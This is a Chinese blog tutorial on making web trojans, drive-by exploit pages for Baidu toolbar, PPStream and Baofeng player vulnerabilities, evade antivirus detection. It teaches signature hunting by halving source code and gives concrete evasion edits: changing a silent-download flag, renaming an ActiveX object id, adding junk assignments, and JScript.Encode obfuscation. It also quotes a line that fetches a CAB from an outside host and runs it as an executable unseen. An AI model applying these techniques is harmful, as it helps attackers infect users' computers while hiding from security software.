最近一段时间,很多国内知名的应用程序都出现了很严重的安全漏洞,而这些漏洞的运用方法也都出奇地一致——网页木马。可是网页木马和木马程序一样,一经推出就会很快被杀毒软件所查杀。关于木马程序的免杀已经介绍过很多了,今天就来看看网页木马是如何进行免杀制作的。
一.百度搜索网页木马
百度搜霸漏洞是由于BaiduBar.dll ActiveX控件中存在一个可以供远程代码执行的高危漏洞。运行百度搜霸漏洞网页木马生成器来创建一个自己需要的网页木马文件。分别利用瑞星和卡巴斯基对这个文件进行查杀,发现目前只有瑞星可以对这个文件进行查杀。
现在我们就利用常见的源代码折半法来进行文件特征码的寻找井进行查杀,所谓源代码折半法,就是把源代码从中一分为二,接替来查看哪一部分代码被杀,如果发现两层以上的特征码再将这段分开,然后依次类推缩小范围,最终找到文件中特征码的所在位置,这也是网页木马免杀最常用的检测方法。
由于百度搜霸网页木马的代码很少很清晰,因此制作免杀起来还是有一定的难度的,所以我们只能从文件代码中间进行修改操作。举个例子,比如说“( "http://www.weixanmanbu.com/cak.cab","muma .exe",0)”,这段代码是网页木马先利用DloadDS()函数下载CAB文件,然后在本地将其转化为可执行文件再运行,在这段代码最后有一个参数0,它的作用就是让下载的文件不显示给用户。我们只需要把参数0改为1,网页木马文件就可以起到免杀的效果了。不过问题也随之而来了,改成1后网页木马会弹出一个提示窗口,这个样子很容易被发现并引起用户的怀疑。那应该怎么办呢?其实操作起来很简单。我们只需要将参数0改为00,就可以轻易的躲过瑞星杀毒软件的检测。
二.PPStream网页木马
PPStream网页木马是通过PPStream的堆栈溢出产生的。首先还是通过PPStream漏洞生成器来创建一个网页木马文件,接着通过金山毒霸对其进行查杀,毋庸置疑已经被查杀了。我们还是先通过源代码折半法来确定特征码的位置,经过测试发现特征码处于<objeot id="ppc" Classid=”CLSID:5EC7C511-CDOF-42E6-830C-1BD9882F3458">这段中。其实制作过免杀网页木马的用户一眼就可以看出,问题一定是在ppc这个参数里面,因为参数从来就是杀毒软件特征码的提取内容。我们将ppc改为duba,然后网页木马文件就免杀了。不过需要大家注意的是,这段代码和后面的是相连的,因此只要使用ppc参数的,就需要改成duba才可以。这个方法对于其它的杀毒软件,比如瑞星也可以起到免杀的效果。
三.暴风影音网页木马
暴风影音网页木马是由于暴风影音II中mps.dll组件多个缓冲区溢出漏洞造成的,也是近期非常热门的一个软件漏洞。创建好我们的网页木马后进仟查杀,发现很多杀毒软件都能够将其查杀。同样通过路改参数就可以避过金山毒霸的查杀,但却无法过瑞星和卡巴斯基。
我们找到memory=new Array();,接着在其下面添加一句google=memory。本来变量memory是直接转向new Array()的,现在我们在中间添加了一句新的代码,这样就让google先转到变量memory,然后再从memory转向new Array()。实际上就是让代码多走了一步路,这在程序中本来是不应该存在的,这么做就相当于在网页代码里而添加了一段花指令。保存修改后再查杀网页木马文件,发现已经通过了瑞星的检测。
网页木马的免杀除了这种修改源代码的方法外。还可以利用代码加密的方法来进行免杀操作。网页木马的加密方法有很多,常用的就是微软的JScript.Encode脚本来加密,当然用户自己编写加密函数效果会更好。现在同上这种在线进行JScript.Encode加密解密的网页也有很多,只需要将网页木马源代码粘贴在网页的输入框内,接着按“Encodc解密”按钮就可以了。需要用户注意的是,加密时应该只对脚本部分进行加密,不需要对<script language="">脚本标记进行加密,并且加密后脚本标记应该改为<script language ="JScript.Encode">。
到此为止,关于网页木马免杀的相关内容就为大家介绍到这儿,从上面的介绍我们可以看到,网页木马免杀的方法相对于可执行文件来说还是非常有限的。不过用户只需要利用好过有限的方法,就可以将网页木马隐形于众多的杀毒软件面前,当然这种方法也适用于ASP、PHP这样的网页木马。
本文来自 危险漫步博客 转载请注明;
本文地址:http://www.weixianmanbu.com/article/1143.html